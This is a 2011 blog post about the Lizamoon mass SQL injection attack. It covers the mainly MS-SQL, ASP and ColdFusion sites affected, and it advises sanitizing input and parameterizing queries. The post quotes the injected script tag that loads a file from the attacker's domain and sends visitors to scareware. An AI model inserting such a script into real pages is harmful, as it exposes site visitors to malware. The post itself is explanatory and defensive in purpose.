The Great Lizamoon SQL Injection Attack – March-April 2011



Well – Friday things started getting interesting on tech news sites. Most sites were running phony April fools stories and a few including websense was running with a major attack going on against many SQL based websites. Details were sketchy – people were told to look for ur.php files in their web directory (which isn’t exactly a good test to see if your site has been infected by this SQL injection…) “<script src=http://lizamoon.com/ur.php”> is an example of the code that is inserted into sql databases and what it basically does is force visitors to visit a scareware site where malware may be installed onto their computer that claims they have a virus…. (how many of those have we seen in the last 5-10 years?)

One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable, is there a pattern?


This is one of the things that annoyed me about the coverage of this particular beastie…. okay fine it’s an sql injection – is it mysql? ms-sql? some other blend? Is it attacking wordpress or drupal or movable type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated.) The best estimate I’ve seen is in the 200,000+ range. Google searches showed millions of pages with the suspect text although that included multiple pages per site and many sites that were simply reporting on the exploit.

So…. Saturday I was asked about it and I hadn’t been able to do much research. So, I did a bit of research and found that it seems most every site affected that had been identified by Websense was a Microsoft SQL backend. At that point I breath a bit easier in the fact that I won’t be urgently upgrading 50 or so MySQL based blog engines… In fact after reading a bit further I essentially filed it for the weekend as I have nothing deployed that depends on MS-SQL.

So, today I was thinking that there must be some pattern as to what is vulnerable…. Looking at the google search that shows the infected blurb of code….

I see .cfm pages, .asp pages, .aspx pages, I found a site with this powered by:

“Mango Blog – A ColdFusion blog engine”

I see several other sites that seem to be database driven but it’s unclear what site design engine I’m lookiing out. Really the common denominator is asp/cold fusion and microsofts framework for web applications.

The best advice that is given is that you should always filter/sanitize input into databases. In other words don’t trust your site visitors to put in good things in forms. Trust them to try and break through to the database underneath by using characters that are going to give a hint to your database that it’s time to do a command instead of treating the input as text.

There is a good asp.net article on Preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

That much said…. it seems that better advise is to paramaterize your SQL calls….

Good tutorial site on avoiding sql injection problems…

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here’s the flamebait – are poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it’s just a MS toolkit issue – although the proliferation of “easily make your own database driven site” toolkit would seem to encourage sloppy design. (Yes – I know… open source based blog engines have had their share of sql injection issues too….)

Making it easy for anyone to make a database driven website does not mean everyone will follow best practices for validating input. (In fact in most things that I’ve seen – making things easier seems to encourage cutting corners…)

Related Posts

Blog Traffic Exchange Related Posts
  • Beware: Wolves in sheeps clothing found on different sites (security scams) This is another "wolf in sheeps clothing" alert. The Sunbelt blog has information and tips on a number of other sites that are posing as either the Windows security center page, or a page not found error. The windows security center spoof once again claims the following "Attention! Your system......
  • Zotob updates A couple of late afternoon updates at the handlers diary at incidents.org (sans institute). For starters, it looks like there may be a variation of zotob that has a mass mailer included. I didn't specifically see this in SARC's writeups of zotob.a or zotob.b, so, I'm wondering if this is......
  • Real VNC 4.1.1 vulnerability - Remote Access without password This is one worth checking out anybody using vnc for remote administration. It looks as though intelliadmin has come across a vulnerability in Real VNC 4 (the slashdot post I saw suggested "any machine running VNC 4.1") I haven't tested yet, so I don't know if this ONLY affects REALVNC's......
Blog Traffic Exchange Related Websites
  • Improving Your Site's Ranking With Off Page SEO Off-page search engine optimization is all about applying SEO outside your website, rather than on it. For many new Internet marketers, this term may seem to be confusing, but in actuality, it's not. The purpose of the following article is to clear a few misconceptions and help you build a......
  • Effective Ways to Get Traffic to Affiliate Sites Traffic is one of the most difficult things to get as an affiliate. How do you get it without wasting your money and how do you get traffic that actually converts into sales or leads? One thing is absolutely clear to any affiliate who gets started promoting products: it’s virtually......
  • Social Insecurity (redux) I wrote about the high Phantom Rates one may encounter due to the taxation on Social Security benefits, and I continue to receive positive feedback on that article. I received two questions which I thought appropriate to address here. Is there an age after which you can earn as much......
en.pdf24.org    Send article as PDF   

Similar Posts


See what happened this day in history from either BBC Wikipedia
Search:
Keywords:
Amazon Logo

Comments are closed.


Switch to our mobile site